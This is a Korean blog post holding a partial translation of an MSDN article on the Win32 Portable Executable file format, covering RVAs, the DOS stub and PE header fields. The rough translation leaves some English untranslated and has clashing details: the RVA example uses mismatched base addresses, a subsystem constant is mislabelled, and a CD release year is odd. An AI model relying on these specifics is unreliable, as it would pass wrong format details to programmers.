검색결과 리스트
OldPapers 에 해당되는 글 97건
- 2005.09.26 PE format
- 2005.09.26 endian
- 2005.09.26 insmod와 modprobe의 차이'
- 2005.09.26 HackersLab 레벨별 해킹
- 2005.09.26 library의 사용
- 2005.09.26 uClinux 상에서 플래시 메모리 사용하기
- 2005.08.23 vi에서 정규 표현식 사용하기
- 2005.08.23 Join C Vi 사용법
- 2005.08.23 vi 사용법 간략 정리 버젼
- 2005.07.10 메모리 관련 자료
이 문서는 msdn의 매트 피에트릭의 문서 http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dndebug/html/msdn_peeringpe.asp 를 번역한 것 입니다.
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
운영체제의 실행 파일의 포맷은 많은 부분에서 운영체제의 거울이라고 할 수 있다. 비록 실행 파일 포맷이 대부분의 프로그래머들이 공부해야 할 것중 높은 위치를 차지하지 않지만 중요한 지식을 이러한 방법을 통해서 모을 수 있다. 이 문서에서는 모든 Win32 기반의 시스템 -- Windows NT, Win32s, Windows 95 -- 에서 사용하기 위해서 디자인된 마이크로소프의 PE 파일 포맷에 관해서 알아볼 것이다. PE 파일 포맷은 Windows 2000을 포함한 가까운 장래에 나올 모든 마이크로소프트 운영체제에서 중요한 역할을 할 것이다. Win32s나 Windows NT를 사용하고 있다면, 벌써 PE 파일을 사용하고 있는 것이다. VC++을 사용해서 Windows 3.1만을 위한 프로그램을 작성한다고 할지라도 여전히 PE 파일(32비트 MS-DOS 확장)을 사용하고 있는 것이다. 짧게 말해서, PE는 벌써 보급되어 있으며 가까운 장래에 바뀌기는 힘들것이다. 지금이 이 새로운 실행 파일 타입이 운영체제 파티에 무엇을 가지고 왔는지 살펴볼 시간이다.
끝이 없는 헥사 덤프를 빤히 쳐다보고는 페이지 끝에 나오는 각각의 비트들의 중요성을 곱씹는 대신에 PE 파일 포맷이 포함하고 있는 켄셉과 매일 부딪히는 상황과 관련지어서 살펴보도록 하자. 예를들면 아래에 나오는 것 같은 쓰레드 지역 변수의 표시는
declspec(thread) int i;
실행 파일 내에서 우아하고 간결하게 어떻게 구현되는지 알기 전까지는 나를 미치게 만들었다. 많은 독자들이 16비트 Windows로 부터 넘어왔기 때문에, 나는 Win32 PE 파일 포맷의 구성요소들과 과거 16비트 NE 파일 포맷의 동등한 부분들을 연관지어서 설명할 것이다.
게다가 마이크로소프트사의 컴파일러와 어셈블러가 만들어 내는 새로운 오브젝트 모듈 포맷과의 차이점도 살펴볼 것이다. 이 새로운 OBJ 파일 포맷은 많은 부분에서 PE 파일과 유사하다. 나는 결국 새로운 OBJ 파일 포맷과 관련된 어떠한 문서도 없다는 것을 알게 되었다. 그래서 나는 스스로 그것들을 분석했고, 여기서 PE 포맷에 추가해서 일부를 설명할 것이다.
Windows NT가 VAX VMS와 UNIX로 부터 발전되었다는 것은 많이 알려진 사실이다. Windows NT을 작성한 많은 프로그래머들은 마이크로소프로 오기 전에 그러한 플랫폼에서의 코딩과 디자인을 했었다. Windows NT를 디자인 할때, 그들은 이전에 작성하고 테스트된 툴을 사용해서 부트스트랩 작성 시간을 줄이는 것은 자연스러운 것이었다. 이러한 툴들이 생성하고 같이 작업한 실행가능한 파일 포맷과 오브젝트 모듈 포맷은 COFF(Comm Object File Format의 머릿글자를 따서 지어졌다.)라 불렸다. COFF의 상대적인 나이는 8진수 형태로 필드를 구체화 시켰다는 점에서 알 수 있다. COFF 포맷은 그것 자체로는 좋은 시작 지점이었다. 그러나 Windows NT나 Windows 95와 같은 현대의 운영체제 시스템에서 요구하는 것을 충족시키기 위해서는 확장할 필요가 있었다. 이러한 업데이트의 결과가 PE 포맷이다. 그것은 "이식 가능하다고(prtable)" 불렸다. 왜냐하면 Windows NT의 모든 구현은 다양한 플랫폼에서 (x86, MIPS, Alpha, ...) 동일한 실행 파일 포맷을 사용하기 때문이다. 물론 CPU 명령어에따른 바이너리 인코딩의 차이는 있다. 중요한 점은 운영체제 로더와 프로그래밍 툴들은 각각의 새로운 CPU에 대해서 완전히 새롭게 작성할 필요가 없다는 점이다.
마이크로소프트 위원회가 윈도우 NT를 업그레이드 시키고 빠르게 동작시키기 위한 노력은 존재하는 32비트 툴과 파일 포맷을 포기했다는 점에서 찾을 수 있다. 16비트 윈도우의 가상 디바이스 드라이버는 윈도우 NT가 물망에 오르기 훨씬 전에 나온 다른 32비트 파일 구조 - LE 포맷 - 를 사용하고 있었다. 더 중요한 것은 OBJ 파일 포맷의 변화이다. 윈도우 NT 이전의 C 컴파일러, Win32환경에서 실행되는 모든 마이크로소프트 컴파일러는 COFF 포맷의 OBJ 파일을 생성한다. 볼랜드나 시만텍같은 몇몇 마이크로소프트 경쟁자들은 COFF 포맷을 보류하고 인텔의 OMF 포맷을 사용한다. 마침내 이것은 다양한 컴파일러에서 사용하기 위해서는 OBJ나 LIB 파일을 다른 컴파일러를 위한 별도의 버전을 제작해서 배포하는 수고가 필요가게된 것이다.
PE 포맷은 WINNT.H 헤더파일에 대충(성의없이) 문서화 되어있다. 대략 WINNT.H의 중간 부분 정도에 "Image Format"이라고 이름지어진 섹션이 있다. 이 섹션은 새로운 PE 정보로 옮겨가기전 오래되어 친숙한 MS-DOS MZ 포맷과 NE 포맷 헤더에서 나온 작은 tidbits로 시작한다. WINNT.H는 PE 파일에서 사용되는 가공되지않은 자료 구조들에 대한 정의를 제공한다. 그러나 단지 그 구조체들과 플래그들이 무엇을 의미하는지 이해하기 위한 아주 조금의 유용한 코멘트만 포함하고 있다. PE 포맷에 관한 헤더 파일을 작성했던 사람이 누구든지(Michael J. O'Leary가 떠오르고 있다), 그는 깊숙하게 중첩된 구조체와 매크로를 따라서 길고, 묘사적인 이름에 관한 신봉자임에 틀림없다. WINNT.H와 함께 코등힐때, 이러한 표현을 사용하는 것은 전혀 이상한 것이 아니다.
pNTHeader->
OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DEBUG].VirtualAddress;
WINNT.H의 정보를 좀 더 쉽게 이해하기 위해서는 2001년 10월 이후에 배포된 MSDN 라이브러리 CD-ROM에서 구할 수 있는 Protable Executable and Common Object File Format 항목을 읽기를 권한다.
주제를 COFF 포맷 OBJ로 잠깐 돌려서, WINNT.H 헤더 파일은 COFF OBJ및 LIB 파일을 위한 typedefs와 구조체 정의를 포함하고 있다. 불행히도, 나는 위에 언급된 실행 파일 포맷과 마찬가지로 이것에 관한 어떠한 문서도 찾을 수 없었다. Since PE files and COFF OBJ files are so similar, I decided that it was time to bring these files out into the light and document them as well. PE파일과 COFF OBJ파일은 매우 유사하기 때문에 나는 이러한 파일들에 대한 가벼운 문서를 남기기기로 결정했다.???
PE파일이 무엇으로 구성되었는지에 관해서 알기보다는, 직접 이러한 컨셉을 보기위해서 몇몇 PE 파일들을 덤프하기를 원할 것이다. 만약 Win32 기반의 개발을 위해서 마이크로소프트 툴들을 사용하고 잇다면, DUMPBIN 프로그램이 PE 파일과 COFF OBJ/LIB 파일들을 분석해서 읽을수 있는 형태로 출력해준다. Of all the PE file dumpers, DUMPBIN is easily the most comprehensive. It even has a nifty option to disassemble the code sections in the file it's taking apart. 모든 PE 파일 덤프를 하는 프로그램 중에서, DUMPBIN은 가장 이해하기 쉽다. DUMPBIN은 자신이 분석하고 있는 파일의 코드 섹션을 디어셈블할 수 있는 멋진 옵션을 가지고 있다. 볼랜드 유저는 PE 실행 파일을 보기 위해서 TDUMP를 사용할 수 있다, 그러나 TDUMP는 COFF OBJ 파일들을 이해하지 못한다. 이것은 볼랜드 컴파일러가 COFF 포맷의 OBJ 파일을 만들지 않기 때문에 큰 문제가 되지 않는다.
나는 PE와 COFF OBJ파일을 덤프해주는 PEDUMP라는 프로그램을 만들었다.(Table 1을 보라) 나는 PEDUMP가 DUMPBIN에 비해서 더욱 이해하기 쉬운 출력을 제공한다고 생각한다. 비록 PEDUMP가 디어셈블러를 가지고 있지 않고 LIB 파일을 분석할 수 없지만, 다른 부분들은 DUMPBIN과 기능적으로는 동일하다. 그리고 생각해볼 가치가 있는 새로운 기능들도 추가되어있다. PEDUMP 소스코드는 MSJ 게시판에서 얻을 수 있기 때문에 전체 리스트를 여기에 보이지 않을 것이다. 대신에 내가 설명한 컨셉트들을 보여주기 위해서 PEDUMP의 샘플 출력을 보여줄 것이다.
Win32 와 PE의 기본적인 컨셉
PE 파일의 디자인의 골격을 이루고 있는 기초적인 아이디어들을 살펴보도록 하자. "모듈"이라는 용어는메모리에 로드된 실행 파일이나 DLL의 코드, 데이터 그리고 리소스를 나타낼때 사용할 것이다. 게다가 프로그램이 직접 사용하는 코드와 데이터뿐만 아니라 모듈은 코드와 데이터가 메모리 어느 위치에 있는지 결정하기 위해서 윈도우에서 사용하는 자료 구조로 구성된다. 16비트 윈도우에서는, 윈도우에서 사용하는 자료 구조가 모듈 데이터 베이스 내에 있었다(HMODULE에 의해 참조되는 세그먼트). Win32에서는 이러한 자료 구조들은 지금부터 간단히 설명할 PE 헤더내에 있다.
그림 1. PE 파일 포맷
PE 파일에 관해서 알아야할 첫번째로 가장 중요한 것은 디스크에 있는 실행 파일은 윈도우가 로드한 후의 모듈과 매우 유사하다는 점이다. 윈도우 로더는 디스크 파일로부터 프로세스를 생성하기 위해서 극도로 어려운 일들을 필요로 하지 않는다. 로더는 파일의 조각들을 가상 주소 공간으로 적절하게 매핑하기 위해서 메모리 맵 파일 메카니즘을 사용한다. 건축과 비교하자면 PE 파일을 조립식 주택에 비유할 수 있다. 조립식 주택으로 집을 지으려면 결국 각 부분을 한 번에 하나씩 집 지을 자리에 옮겨 놓은 다음 각 부분을 외부와 연결시키는 작업이 필요하다(PE에 DLL을 연결시키는 것처럼). 이러한 쉬운 로딩 방식은 PE 포맷 DLL에도 동일하게 적용된다. 모듈이 한번 로드되고 나면, 윈도우는 다른 메모리 맵 파일과 같이 효율적으로 다룰수 있게 된다.
이러한 로딩 방식은 16비트 윈도우에서의 상황과 완전히 대조적이다. 16비트 NE 파일 로더는 파일의 일부분을 읽고 메모리 내에 있는 모듈을 표현하기 위한 완전히 새로운 자료 구조를 생성한다. 코드나 데이터 세그먼트가 로드되어야 할 필요가 있을때, 로더는 전역 힙으로 부터 새로운 세그먼트를 할당받고 가공되지 않은 데이터들이 어디에 저장되어있는지 찾고, 그 위치로 이동한 후, 가공되지 않은 데이터를 읽는다. 그리고는 수정해야할 사항들을 적용한다. 게다가, 각각의 16비트 모듈은 세그먼트가 버렸는지에 상관없이 그것이 지금 사용하고 있는 모든 셀렉터들을 기억해야할 필요가 있다.
Win32 에서는, 코드, 데이터, 리소스, 임포트 테이블, 익스포트 테이블및 필요한 다른 모듈 자료 구조들을 위해서 모듈에서 사용되는 모든 메모리는 메모리의 인접한 블록에 위치해 있다. 이러한 상황에서 알아야할 모든것은 로더가 파일을 메모리의 어디로 맵핑했는지이다. 모듈의 모든 다양한 조각들을 아래에 설명하는 이미지의 일부로 저장되어 있는 포인터를 사용해서 쉽게 찾을 수 있다.
다른 가장 중요한 아이디어는 상대 가상 주소(RVA)이다. PE 파일의 많은 필드들은 RVA관점에서 표시하고 있다. RVA는간단하게 파일이 메모리 맵된 곳으로부터 상대적인 몇가지 아이템들의 오프셋이다. 예를들면, 로더가 PE 파일을 가상 주소 공간의 0x1000으로 시작되는 메모리로 맵핑했다고 가정해 보자. 그리고 이미지에 포함된 실제 테이블은 0x10464라는 주소에서 시작된다면, 그 테이블의 RVA는 0x464가 된다.
(Virtual address 0x10464)-(base address 0x10000) = RVA 0x00464
RVA를 쓸모있는 포인터로 변환하기 위해서는, 간단하게 모듈의 베이스 주소에 RVA를 더해주면 된다. 베이스 주소는 EXE나 DLL의 메모리 맵 시작 주소이며 Win32에서 중요한 컨셉이다. 편의상, 윈도우 NT와 윈도우 95는 모듈의 인스턴스 핸들(HINSTANCE)로 모듈의 베이스 주소를 사용한다. Win32에서 모듈의 베이스 주소를 HINSTANCE라 부르는 것은 뭔가 혼란 스럽다. 왜냐하면 "인스턴스 핸들"이라는 용어는 16비트 윈도우에서 유래되었기 때문이다.
16비트 윈도우에서 각각의 애플리케이션 복사본은 다른 복사본과 구분되는 자신만의 독립된 데이터 세그먼트(전역 핸들과 연관되어 있다.)를 할당받는다. 여기에서 인스턴스 핸들이라는 용어가 나온것이다. Win32에서 애플리케이션은 다른 것들과 구분될 필요가 없다. 왜냐하면 동일한 주소 공간을 공유하지 않기 때문이다. 지금까지도, HISTANCE라는 용어는 16비트 윈도우와 32비트 윈도우의 연속성을 유지하기위해서 살아남아있다. Win32를 위해서 중요한 것은 프로세스가 모듈의 콤포넌트를 접근하기 위한 포인터를 얻기위해서 GetModuleHandle 호출할 수 있다는 것이다.
PE파일과 관련해서 마지막으로 알아야할 컨셉은 섹션이다. PE파일내의 섹션은 NE 파일에서의 세그먼트나 리소스와 크게는 비슷한 것이다. 섹션은 코드와 데이터를 모두 포함하고 있다. 세그먼트와 달리, 섹션은 사이즈의 제약없이 연속된 메모리 블록이다. 몇가지 섹션은 프로그램에서 직접 선언하고 사용하는 코드나 데이터를 포함한다. 반면에 다른 섹션은 링커와 라이브러리에 의해서 생성된 것이며 운영체제와 관련한 중요한 정보를 포함하고 있다. 몇몇 PE 포맷에 대한 설명에서, 섹션을 또한 오브젝트라고 부르기도 한다. 오브젝트라는 용어는 너무 많은 중첩된 의미를 가지고 있다. 그래서 나는 코드와 데이터 영역을 섹션이라고 부르는 것을 선호한다.
PE 헤더
모든 다른 파일 포맷과 마찬가지로, PE 파일도 파일의 나머지 부분이 어떻게 보일지 정의하는 알려진 (찾기 쉬운) 위치에 있는 필드들을 가지고 있다. 이 헤더는 코드와 데이터 영역의 위치와 사이즈, 운영체제에서 정한것으로 스택 크기와 앞으로 짧게 설명할 다른 중요한 정보 조각들의 정보를 포함하고 있다. 마이크로소프트사에서 만든 다른 실행 포맷처럼, 이 메인 헤더는 파일의 시작 부분에 있지 않다. 전형적인 PE파일의 처음 수백 바이트는 MS-DOS 스텁으로 구성된다. 이 스텁은 "This program cannot be run in MS-DOS mode."라는 것을 출력하고 그러한 효과를 지닌 작은 프로그램이다. 따라서 만약 Win32 기반의 프로그램을 Win32를 지원하지 않는 환경에서 실행하게 되면, 해당 메시지를 출력하게 된다. Win32 로더가 PE 파일을 메모리 맵할때, 메모리 맵 파일의 첫번째 바이트는 MS-DOS 스텁의 첫번째 바이트와 일치한다. 맞다. Win32 기반의 프로그램이 시작할때마다, MS-DOS 기반의 프로그램또한 공짜로 로드되는 것이다.
다른 마이크로소프트 실행 포맷과 같이, 진짜 헤더는 MS-DOS 스텁 헤더에 저장되어져있는 시작 오프셋을 조사해서 찾을수 있다. WINNT.H 파일은 PE 헤더가 어디서 시작하는지 찾기 쉽게 만들기 위해서 MS-DOS 스텁 헤더를 위한 구조체 정의를 포함하고 있다. e_lfanew 필드는 실질적인 PE 헤더에 대한 상대적인 오프셋(RVA) 이다. 메모리에서 PE 헤더를 가리키는 포인터를 얻기 위해서는, 단지 해당 필드의 값을 이미지 베이스 주소에 더하기만 하면 된다.
// Ignoring typecasts and pointer conversion issues for clarity...
pNTHeader = dosHeader + dosHeader->e_lfanew;
메인 PE 헤더에 대한 포인터를 한번 얻고나면, 재미있는 일들이 시작된다. 메인 PE 헤더는 WINNT.H에 정의된 IMAGE_NT_HEADERS라는 타입의 구조체이다. 이 구조체는 DWORD와 두개의 서브 구조체로 구성되고 아래에 나오는 것과 같은 순서로 놓여져있다.
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER OptionalHeader;
아스키 텍스트로 보여지는 Singnature 필드는 "PE\0\0"이다. 16비트 윈도우의 NE파일에서는 MS-DOS헤더 내에 포함된 e_lfanew 필드를 사용해서 포인터를 구했을때, PE 대신 NE 시그니처를 볼 수 있다. 같은 이치로, 윈도우즈 3.x 가상 디바이스 드라이버 (VxD)에서는 시그니처 필드에 LE가 나타난다.
PE 헤더에서 PE 시그니쳐 DWORD 다음에 따라 나오는것은 IMAGE_FILE_HEADER 타입의 구조체이다. 이 구조체의 필드들은 단순히 파일에 관한 가장 기초적인 정보들만 포함하고 있다. 이 구조체는 오리지널 COFF 구현과 동일한 것으로 보인다. 게다가 PE 헤더의 일부일뿐만 아니라, 그것은 또한 마이크로소프트 Win32 컴파일러가 생성한 COFF OBJ의 시작 부분에도 나타난다. Table 2에 IMAGE_FILE_HEADER의 필드들이 표시되어 있다.
Table 2. IMAGE_FILE_HEADER 필드
WORD Machine
이 파일이 사용되도록 계획된 CPU. 아래의 CPU ID가 정의되어 있다.: 0x14d는 인텔 i860을 의미한다.
0x14c 인텔 i386 (486과 586에도 동일한 ID)
0x162 MIPS R3000
0x166 MIPS R4000
0x183 DEC Alpha AXP
WORD NumberOfSections
파일에 있는 섹션 갯수
DWORD TimeDateStamp
링커(또는 OBJ파일을 생성한 컴파일러)가 파일을 생성한 시간. 이 필드는 1969-12-31 4:00 부터의 초를 카운트하는 숫자이다.
DWORD PointerToSymbolTable
COFF 심볼 테이블의 파일 오프셋
이 필드는 COFF 디버그 정보를 가진 OBJ 파일과 PE파일에서만 사용한다.
PE 파일은 다양한 디버그 포맷을 지원한다. 그래서 디버거는 데이타 디렉토리(후에 정의된) 에 있는IMAGE_DIRECTORY_ENTRY_DEBUG 엔트리를 참조 하기만 하면 된다.
DWORD NumberOfSymbols
COFF 심볼 테이블에 있는 심볼 갯수. 위의 내용 참고.
WORD SizeOfOptionalHeader
이 구조체 다음에 나올 수 있는 추가적인 헤더의 크기.
OBJ 파일에서, 이 필드는 0이다. 실행파일에서는, 이 구조체 뒤에 따라 나오는 IMAGE_OPTIONAL_HEADER 구조체의 크기이다.
WORD Characteristics
파일과 관련된 정보 플래그. 중요한 필드들: 0x0001 이 파일에서는 재배치가 없다.
0x0002 파일은 실행 가능한 이미지이다. (OBJ나 LIB가 아니다.)
0x2000 파일은 프로그램이 아닌 동적 연결 라이브러이다.
WINNT.H에 정의된 다른 필드들
PE 헤더의 세번째 컴포넌트는 IMAGE_OPTIONAL_HEADER 타입의 구조체 이다. PE 파일에서는 이 부분은 확실히 옵션이 아니다. COFF 포맷은 표준 IMAGE_FILE_HEADER와 관련된 추가적인 정보로 구성된 구조체를 정의하기 위해서 개개의 구현을 허용한다. IMAGE_OPTIONAL_HEADER에 있는 필드들은 PE 디자이너들이 IMAGE_FILE_HEADER에 있는 기초적인 정보 이상으로 중요한 정보라고 느낀 것들이다.
IMAGE_OPTIONAL_HEADER의 모든 필드들에 관해서 알 필요는 없다. (Figure 4를 보라) 알고있어야 할 더 중요한 것은 ImageBase와 Subsystem 필드이다. 필드에 관한 설명을 훑어보거나 건너뛰어도 된다.
Table 3. IMAGE_OPTIONAL_HEADER 필드
WORD Magic
어느정도 시그니쳐 워드(WORD)로 보임. 항상 0x010B로 셋팅되어 있다.
BYTE MinorLinkerVersion
이 피알을 생성한 링커의 버전.
숫자는 16진수가 아닌 10진 값으로 출력되어야 한다. 전형적인 링커 버전은 2.23이다.
DWORD SizeOfCode
모든 코드 섹션을 합한 사이즈.
일반적으로, 대부분의 파일은 하나의 코드 섹션을 가지고 있다, 그래서 이 필드는 .text 섹션의 크기와 일치한다.
DWORD SizeOfInitializedData
이것은 초기화된 데이터로 구성된 섹션의 전체 크기로 추정된다. (코드 세그먼트를 포함하지 않은)
그러나, 이것은 파일에서 무엇이 나오는지 일정하지 않다.
DWORD SizeOfUninitializedData
로더가 가상 주소 공간위에 프로그램을 위해서 할당한 영역위에 있는 섹션의 크기, 그러나 디스크 파일에서는 어떠한 공간도 가지지 않는다. 이 섹션들은 프로그램 시작시 특정한 값을 가질 필요가 없다. 그래서 초기화 되지 않은 데이터란 용어를 사용했다. 초기화되지않은 데이터는 일반적으로 .bss로 불리는 섹션으로 통한다.
DWORD AddressOfEntryPoint
로더가 실행을 시작하는 주소. 이것은 RVA이다. 그리고 일반적으로 .text섹션에서 발견된다.
DWORD BaseOfCode
파일의 코드 섹션들이 시작되는 곳의 RVA. 코드 섹션들은 전형적으로 메모리에서 data 섹션들 이전에 나타나며 PE 헤더 이후에 나타난다. 이 RVA는 마이크로소프트 링커가 생성한 EXE들에서는 보통 0x10000이다. 볼랜드의 TLINK32는 이미지 베이스 주소에 첫번째 코드 섹션의 RVA를 더한후에 그것을 이 필드에 저장한다.
DWORD BaseOfData
파일의 데이터 섹션이 시작하는 곳의 RVA. 데이터 섹션은 통상적으로 메모리에서 PE헤더와 코드 섹션 다음의 마지막 부분에 오게 된다.
DWORD ImageBase
링커가 실행 파일을 만들때, 링커는 파일이 메모리의 어느 위치에 메모리 맵될지 가정한다. 그 주소가 이 필드에 저장되어 있다. 로드 주소를 가정하는 것은 링커가 최적화를 할 수 있게한다. 만약 파일이 로더에 의해서 실제로 그 주소로 메모리 맵된다면, 코드는 실행되기 전에 어떠한 패치도 할 필요가 없게 된다. 윈도우 NT를 위해서 생성된 실행파일에서는, 기본 이미지 베이스 주소는 0x1000이다. DLL에서는 기본값이 0x400000이다. 윈도우 95에서는 0x10000주소는 32비트 EXE파일을 로드하는데 사용할 수 없다. 왜냐하면 선형적인 주소공간을 모든 프로세스가 공유해서 사용하기 때문이다. 이러한 이유때문에, 마이크로소프는 Win32 실행 파일의 기본 베이스 주소를 0x400000로 변경했다. 로더가 베이스 주소를 재배치해야할 필요가 있기 때문에, 0x10000을 기본 주소로 가정하고 링크된 오래된 프로그램은 Win95 환경 아래에서는 로드시간이 더 길게 된다.
DWORD SectionAlignment
메모리로 맵될때, 각각의 섹션은 이 값의 배수가 되는 가상 주소에서 시작된다는 것을 보장받는다. 페이징과 같은 목적 때문에, 기본 섹션 정렬 값은 0x1000이다.
DWORD FileAlignment
PE 파일에서, 각각의 섹션은 이 값의 배수가 되는 곳에서 시작하도록 보장받는데 합의한 값. 기본 값은 0x200 바이트이다. 아마도 섹션은 항상 디스크 섹터(이것 또한 0x200 바이트)의 시작 지점에서 시작한다는 것을 보장해야 하기 때문일 것이다. 이 필드는 NE 파일의 세그먼트/리소스 정렬 크기와 같다. NE 파일과는 다르게, PE 파일은 전형적으로 수백개의 섹션을 가지지 않는다. 따라서 파일 섹션 정렬때문에 낭비되는 공간은 아주 작다.
WORD MajorOperatingSystemVersion
WORD MinorOperatingSystemVersion
이 실행 파일을 실행하는데 요구되는 최소한의 운영체제 버전. 이 필드는 다소 난해하다. 서브시스템 필드(추후에 소개될)또한 같은 목적으로 예약된 것처럼 보이기 때문이다. 현재까지 모든 Win32 Exe 파일에서 이 필드의 기본값은 1.0이다.
WORD MajorImageVersion
WORD MinorImageVersion
사용자가 정의할 수 있는 필드이다. 이것은 EXE나 DLL을 다른 버전으로 만들 수 있게 허용한다. 링커의 /VERSION 스위치를 사용해서 이 필드를 설정할 수 있다. 예를 들면, "LINK /VERSION:2.0 myobj.obj".
WORD MajorSubsystemVersion
WORD MinorSubsystemVersion
실행 파일을 실행하는데 요구되는 서브시스템의 최소 버전번호를 포함하고 있다. 이 필드의 일반적인 값은 3.10이다. (윈도우 NT 3.1을 의미한다.)
DWORD Reserved1
항상 0으로 설정하는 것으로 보인다.
DWORD SizeOfImage
로더가 걱정하는 이미지 일부의 전체 크기로 추정된다. 이것은 이미지의 베이스 주소에서 시작해서 마지막 섹션 끝까지의 영역의 크기를 말한다. 마지막 섹션의 끝은 섹션 정렬의 배수 근처에 있게 된다.
DWORD SizeOfHeaders
The size of the PE header and the section (object) table. The raw data for the sections starts immediately after all the header components. PE 헤더와 (오브젝트) 테이블 섹션의 크기이다. 이 섹션의 바이너리 데이터는 모든 헤더 구성 요소 다음에 바로 위치한다.
DWORD CheckSum
아마도 파일의 CRC 체크섬인 것 같다. 다른 마이크로소프트의 실행 파일 포맷에서 이 필드는 0으로 설정되고 무시된다. 이 방법이 통하지 않는 한가는 예외는 신뢰된 서비스이다. 이 EXE 파일은 반드시 정확한 체크섬 값을 가지고 있어야 한다.
WORD Subsystem
실행 파일이 유저 인터페이스로 사용하는 서브시스템 타입. WINNT.H는 다음과 같은 값들을 정의하고 있다.
NATIVE 1 서브시스템을 요구하지 않는다.(디바이스 드라이버 같은것들)
WINDOWS_GUI 2 윈도우 GUI 서브시스템에서 실행된다.
WINDOWS_GUI 3 윈도우 문자 서브시스템에서 실행된다. (콘솔 애플리케이션)
OS2_CUI 5 OS/2 문자 서브시스템에서 실행된다. (OS/2 1.x 애플리케이션만 적용된다.)
POSIX_CUI 7 Posix 문자 서브시스템에서 실행된다.
WORD DllCharacteristics
DLL의 초기화 함수(DllMain과 같은)가 호출되는 환경과 관련된 플래그 집합. 이 값은 항상 0으로 설정되는 것으로 보인다. 그러나 운영체제는 여전히 DLL 초기화 함수를 항상 모든 4가지 이벤트에 맞추어서 호출한다. 아래와 같은 값들이 정의되어 있다.
1. DLL이 프로세스 주소 공간으로 처음 로딩될 때.
2. 쓰레드가 종료될 때.
3. 쓰레드가 시작될 때.
4. DLL이 종료될 때.
DWORD SizeOfStackReserve
초기 쓰레드의 스택을 위해서 예약해야할 가상 메모리의 크기. 다음 필드를 참고해 보면 이 메모리 전부가 실제 메모리로 사용되지 않는다는 것을 알 수 있다. 이 필드의 기본값은 0x100000 (1MB) 이다. 만약 CreateThread에서 스택 크기를 0으로 설정했다면 그 결과과 만들어진 쓰레드는 이것과 동일한 크기의 스택을 가지게 된다.
DWORD SizeOfStackCommit
초기 쓰레드의 스택을 위해서 사용하는 실제 메모리의 크기. 마이크로소프트 링커는 기본적으로 이 필드를 0x1000(1페이지) 바이트로 설정된다. 반면에 TLINK32는 2 페이지로 만든다.
DWORD SizeOfHeapReserve
초기 프로세스의 힙으로 예약해야할 가상 메모리의 크기. 이 힙 핸들은 GetProcessHeap함수를 호출해서 얻을 수 있다. 이 메모리 모두가 실제 메모리로 사용되지 않는다. (다음 필드를 보라)
DWORD SizeOfHeapCommit
초기 프로세스 힙으로 사용될 실제 메모리의 크기. 기본적으로 1페이지가 설정된다.
DWORD LoaderFlags
WINNT.H에 의하면 이것은 디버깅 지원과 관련된 필드로 보인다. 나는 이제껏 한번도 이 비트를 활성화 시켜둔 실행 파일을 본적이없을 뿐 아니라, 링커가 이 필드를 설정하게 하는 방법또한 확실치 않다. 다음과 같은 값들이 정의되어져 있다.
1. 프로세스를 시작하기 전에 브레이크 포인트 명령을 실행한다.
2. 프로세스가 로드된 이후에 디버거를 실행한다.
DWORD NumberOfRvaAndSizes
DataDirectory 배열 (아래에 나오는)에 있는 엔트리 갯수. 이 값은 현재까지 툴에서는 항상 16으로 설정한다.
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]
IMAGE_DATA_DIRECTORY 구조체의 배열이다. 배열의 초기 값은 실행 파일의 중요한 부분의 RVA 시작 지점과 크기을 포함하고 있다. 배열 끝의 몇가지 항목은 현재까지는 사용되지 않는다. 배열의 첫번째 요소는 항상 익스포트 함수 테이블(만약 존재한다면) 의 주소와 크기를 가지고 있다. 두번째 배열의 항목은 임포트된 함수 테이블의 주소와 크기를 가지고 있다. 정의된 배열 항목에 대한 완전한 리스트는 WINNT.H에서 #define으로 선언된 IMAGE_DIRECTORY_ENTRY_XXX를 참고하면 된다. 이 배열은 각각의 이미지 섹션을 순회하면서 같은 이름이 있는지 비교하지 않고 로더가 이미지의 특정한 섹션을 빨리 찾을 수 있도록 도와준다. (예를들면, 임포트된 함수 테이블과 같은 것이다.) 대부분의 배열 항목은 전체 섹션 데이터에 대한 정보를 가지고 있다. 그러나, IMAGE_DIRECTORY_ENTRY_DEBUG 항목은 .rdata 섹션의 일부 바이트만을 포함한다.
섹션 테이블
PE 헤더와 바이너리 데이터 데이터 사이에는 이미지의 섹션을 위한 섹션 테이블이 위치해 있다. 섹션 테이블은 본질적으로 이미지에 포함된 각각의 섹션과 관련된 정보를 가지고 있는 전화번호부와 같은 역할을 한다. 이미지에 포함된 섹션은 알파벳순이 아닌, 시작 주소(RVA)에 의해서 정렬된다.
이제 섹션이 무엇인지 좀 더 명확하게 할 수 있다. NE 파일에서, 프로그램의 코드와 데이터는 파일의 구분된 "세그먼트"내에서 정렬되어진다. NE 헤더중의 일부는 프로그램이 사용하는 각각의 세그먼트의 구조체 배열이다. 배열속의 각각의 구조체는 하나의 세그먼트에 대한 정보를 가지고 있다. 저장되어져있는 정보는 세그먼트의 타입(코드냐 데이터냐), 크기, 그리고 파일에서 저장된 위치에 대한 것들을 포함한다. PE 파일에서, 섹션 테이블은 NE 파일의 세그먼트 테이블과 유사하다. 반면에 NE 파일의 세그먼트 테이블과는 대조적으로 각각의 섹션 테이블 항목은 파일의 바이너리 데이터가 메모리로 맵핑되는 위치에 대한 주소를 저장하고 있다. 섹션이 32비트 세그먼트와 유사하지만, 섹션이 실제로 각각의 세그먼트가 되는 것은 아니다. 그것들은 단지 프로세스의 가상 주소 공간에서 메모리 범위일 뿐이다.
또 다른 PE 파일이 NE 파일의 차이점은 프로그램이 사용하지 않고 운영체제에서 사용하는 지원(서포팅) 데이터들을 다루는 방법이다. 예를들면, 실행 파일이 사용하는 DLL의 목록이나 픽스업 테이블의 위치와 같은 것이다. NE 파일에서는, 리소스는 세그먼트로 고려되지 않는다. 비록 리소스에 할당된 셀렉터들이 있다고 하더라도, 리소스와 관련된 정보는 NE 헤더의 세그먼트 테이블에 저장되지 않는다. 대신에, 리소스는 NE 헤더의 마지막에 위차한 분리된 테이블내에 저장된다. 임포트되거나 익스포트된 함수와 관련된 정보 또한 독립된 세그먼트를 가질 권리가 없다. 해당 정보들은 NE 헤더에 포함된다.
